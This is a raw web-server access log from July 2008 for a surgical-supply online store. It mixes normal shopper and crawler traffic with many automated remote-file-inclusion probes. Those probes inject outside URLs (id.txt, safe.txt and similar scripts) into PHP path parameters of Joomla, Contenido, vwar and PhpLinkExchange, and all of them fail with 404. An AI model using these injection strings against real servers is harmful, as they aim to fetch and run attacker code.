209.59.12.99 - - [28/Jul/2008:00:00:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [28/Jul/2008:00:05:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.31.206.138 - - [28/Jul/2008:00:07:34 -0400] "GET /logs/error_log.Q108040800//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://201.70.9.109/safe.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
209.59.12.99 - - [28/Jul/2008:00:10:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.67.180 - - [28/Jul/2008:00:09:30 -0400] "GET /logs/access_log.Q108042300 HTTP/1.1" 200 5377131 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
210.245.87.117 - - [28/Jul/2008:00:14:37 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:00:14:37 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:00:14:38 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:00:14:38 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
209.59.12.99 - - [28/Jul/2008:00:15:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
68.8.60.107 - - [28/Jul/2008:00:16:09 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 75525 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
68.8.60.107 - - [28/Jul/2008:00:16:10 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
68.8.60.107 - - [28/Jul/2008:00:16:10 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
68.8.60.107 - - [28/Jul/2008:00:16:10 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
68.8.60.107 - - [28/Jul/2008:00:16:10 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
68.8.60.107 - - [28/Jul/2008:00:16:10 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
68.8.60.107 - - [28/Jul/2008:00:16:10 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
68.8.60.107 - - [28/Jul/2008:00:16:10 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
68.8.60.107 - - [28/Jul/2008:00:16:11 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
68.8.60.107 - - [28/Jul/2008:00:16:11 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
68.8.60.107 - - [28/Jul/2008:00:16:11 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
68.8.60.107 - - [28/Jul/2008:00:16:11 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
68.8.60.107 - - [28/Jul/2008:00:16:11 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
68.8.60.107 - - [28/Jul/2008:00:16:11 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
68.8.60.107 - - [28/Jul/2008:00:16:11 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
68.8.60.107 - - [28/Jul/2008:00:16:11 -0400] "GET /images/cat_expand.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
68.8.60.107 - - [28/Jul/2008:00:16:11 -0400] "GET /images/cat_dot.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
68.8.60.107 - - [28/Jul/2008:00:16:12 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
68.8.60.107 - - [28/Jul/2008:00:16:12 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
68.8.60.107 - - [28/Jul/2008:00:16:12 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
68.8.60.107 - - [28/Jul/2008:00:16:12 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
68.8.60.107 - - [28/Jul/2008:00:16:12 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
68.8.60.107 - - [28/Jul/2008:00:16:12 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
68.8.60.107 - - [28/Jul/2008:00:16:12 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
68.8.60.107 - - [28/Jul/2008:00:16:12 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
68.8.60.107 - - [28/Jul/2008:00:16:13 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
68.8.60.107 - - [28/Jul/2008:00:16:13 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
68.8.60.107 - - [28/Jul/2008:00:16:13 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
68.8.60.107 - - [28/Jul/2008:00:16:20 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LAF20932F5412510026B603Q+M37+ENG HTTP/1.1" 200 45344 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
68.8.60.107 - - [28/Jul/2008:00:16:21 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LAF20932F5412510026B603Q+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
68.8.60.107 - - [28/Jul/2008:00:16:21 -0400] "GET /images/items/00320000_THUMB.JPG HTTP/1.1" 200 2057 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LAF20932F5412510026B603Q+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
68.8.60.107 - - [28/Jul/2008:00:16:21 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LAF20932F5412510026B603Q+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
68.8.60.107 - - [28/Jul/2008:00:16:27 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LAF20932F5412510026B603Q+M37+ENG HTTP/1.1" 200 45334 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
68.8.60.107 - - [28/Jul/2008:00:16:31 -0400] "GET /images/items/00320145_THUMB.JPG HTTP/1.1" 200 2238 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LAF20932F5412510026B603Q+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
209.59.12.99 - - [28/Jul/2008:00:20:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.93.82.97 - - [28/Jul/2008:00:25:20 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
80.93.82.97 - - [28/Jul/2008:00:25:20 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
76.30.11.245 - - [28/Jul/2008:00:25:27 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
76.30.11.245 - - [28/Jul/2008:00:25:27 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
76.30.11.245 - - [28/Jul/2008:00:25:32 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
76.30.11.245 - - [28/Jul/2008:00:25:32 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
209.59.12.99 - - [28/Jul/2008:00:25:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.22.179 - - [28/Jul/2008:00:26:27 -0400] "GET /logs/error_log.Q107110200 HTTP/1.0" 200 74929 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.67.180 - - [28/Jul/2008:00:27:40 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0F3D9B2070125700F435001+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [28/Jul/2008:00:30:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [28/Jul/2008:00:35:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.56.19.13 - - [28/Jul/2008:00:36:21 -0400] "GET /images/psearch_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
210.56.19.13 - - [28/Jul/2008:00:36:21 -0400] "GET /images/login_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
210.56.19.13 - - [28/Jul/2008:00:36:59 -0400] "GET /images/login_go-over.gif HTTP/1.0" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
210.56.19.13 - - [28/Jul/2008:00:36:59 -0400] "GET /images/psearch_go-over.gif HTTP/1.0" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
216.246.28.208 - - [28/Jul/2008:00:38:56 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://forum.tourdumonde.be//includes/id2.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.810"
216.246.28.208 - - [28/Jul/2008:00:38:56 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://forum.tourdumonde.be//includes/id2.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
209.59.12.99 - - [28/Jul/2008:00:40:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.67.180 - - [28/Jul/2008:00:43:41 -0400] "GET /logs/access_log.Q107090900 HTTP/1.1" 200 426775 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [28/Jul/2008:00:45:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.33.84.163 - - [28/Jul/2008:00:46:09 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://213.238.52.61/coinsworld/werbung/id2.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
213.33.84.163 - - [28/Jul/2008:00:46:09 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://213.238.52.61/coinsworld/werbung/id2.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
67.205.76.81 - - [28/Jul/2008:00:48:17 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://iraqmarkets.com//ray/modules/global/inc/oye.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.810"
67.205.76.81 - - [28/Jul/2008:00:48:17 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://iraqmarkets.com//ray/modules/global/inc/oye.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.810"
209.59.12.99 - - [28/Jul/2008:00:50:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [28/Jul/2008:00:55:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.67.180 - - [28/Jul/2008:00:57:20 -0400] "GET /logs/access_log.Q108042800 HTTP/1.1" 200 4345413 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [28/Jul/2008:01:00:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
75.127.70.16 - - [28/Jul/2008:01:05:21 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://mabazzer.pytalhost.de/v6/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.811"
75.127.70.16 - - [28/Jul/2008:01:05:21 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://mabazzer.pytalhost.de/v6/id.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.811"
209.59.12.99 - - [28/Jul/2008:01:05:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.33.84.163 - - [28/Jul/2008:01:09:59 -0400] "GET /logs/error_log.Q108031900/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://213.238.52.61/coinsworld/werbung/id2.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
213.33.84.163 - - [28/Jul/2008:01:10:00 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://213.238.52.61/coinsworld/werbung/id2.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
213.33.84.163 - - [28/Jul/2008:01:10:00 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://213.238.52.61/coinsworld/werbung/id2.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
213.33.84.163 - - [28/Jul/2008:01:10:42 -0400] "GET /logs/error_log.Q108040800/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://213.238.52.61/coinsworld/werbung/id2.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
209.59.12.99 - - [28/Jul/2008:01:10:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.67.180 - - [28/Jul/2008:01:11:08 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L9F2FCF215AC21100ABB503N+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [28/Jul/2008:01:15:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
207.44.234.57 - - [28/Jul/2008:01:15:58 -0400] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
207.44.234.57 - - [28/Jul/2008:01:15:58 -0400] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
207.44.234.57 - - [28/Jul/2008:01:16:28 -0400] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
207.44.234.57 - - [28/Jul/2008:01:16:29 -0400] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
209.59.12.99 - - [28/Jul/2008:01:20:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.214.51.73 - - [28/Jul/2008:01:20:51 -0400] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
85.214.51.73 - - [28/Jul/2008:01:20:51 -0400] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
80.93.56.169 - - [28/Jul/2008:01:21:19 -0400] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
80.93.56.169 - - [28/Jul/2008:01:21:19 -0400] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
67.181.80.10 - - [28/Jul/2008:01:22:21 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
67.181.80.10 - - [28/Jul/2008:01:22:21 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
67.181.80.10 - - [28/Jul/2008:01:22:23 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
67.181.80.10 - - [28/Jul/2008:01:22:23 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
216.246.28.208 - - [28/Jul/2008:01:23:36 -0400] "GET /logs/error_log.Q108031900/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://forum.tourdumonde.be//includes/id2.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.810"
216.246.28.208 - - [28/Jul/2008:01:23:36 -0400] "GET /logs/error_log.Q108031900/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://forum.tourdumonde.be//includes/id2.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.810"
216.246.28.208 - - [28/Jul/2008:01:23:36 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://forum.tourdumonde.be//includes/id2.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
216.246.28.208 - - [28/Jul/2008:01:23:36 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://forum.tourdumonde.be//includes/id2.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
216.246.28.208 - - [28/Jul/2008:01:23:36 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://forum.tourdumonde.be//includes/id2.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.810"
216.246.28.208 - - [28/Jul/2008:01:23:36 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://forum.tourdumonde.be//includes/id2.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.810"
216.246.28.208 - - [28/Jul/2008:01:25:03 -0400] "GET /logs/error_log.Q108031900/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://forum.tourdumonde.be//includes/id2.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.810"
216.246.28.208 - - [28/Jul/2008:01:25:03 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://forum.tourdumonde.be//includes/id2.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
